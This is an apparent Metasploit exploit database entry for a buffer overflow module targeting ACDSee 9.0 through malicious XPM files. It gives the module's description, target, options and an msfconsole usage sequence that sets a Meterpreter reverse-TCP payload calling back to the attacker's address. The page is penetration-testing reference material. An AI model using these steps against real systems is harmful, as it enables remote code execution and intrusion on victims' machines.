ACDSee XPM File Section Buffer Overflow | Metasploit Exploit Database (DB)

ACDSee XPM File Section Buffer Overflow

This module exploits a buffer overflow in ACDSee 9.0. When viewing a malicious XPM file with the ACDSee product, a remote attacker could overflow a buffer and execute arbitrary code.

Search Other Modules


Exploit Rank

  • Good

Exploit Authors

  • MC < mc [at] metasploit.com >

Vulnerability References


Exploit Targets

  • 0 - ACDSee 9.0 (Build 1008) (default)

Exploit Development


Similar Exploit Modules


Exploit Usage Information

$ msfconsole

                ##                          ###           ##    ##
 ##  ##  #### ###### ####  #####   #####    ##    ####        ######
####### ##  ##  ##  ##         ## ##  ##    ##   ##  ##   ###   ##
####### ######  ##  #####   ####  ##  ##    ##   ##  ##   ##    ##
## # ##     ##  ##  ##  ## ##      #####    ##   ##  ##   ##    ##
##   ##  #### ###   #####   #####     ##   ####   ####   #### ###
                                      ##

msf > use exploit/windows/fileformat/acdsee_xpm
msf exploit(acdsee_xpm) > show payloads
msf exploit(acdsee_xpm) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(acdsee_xpm) > set LHOST [MY IP ADDRESS]
msf exploit(acdsee_xpm) > exploit


Exploit Module Options

FILENAME The file name. (default: msf.xpm)
ContextInformationFile The information file that contains context information
DisablePayloadHandler Disable the handler code for the selected payload
DynamicSehRecord Generate a dynamic SEH record (more stealthy)
EnableContextEncoding Use transient context when encoding payloads
VERBOSE Enable detailed status messages
WORKSPACE Specify the workspace for this module
WfsDelay Additional delay when waiting for a session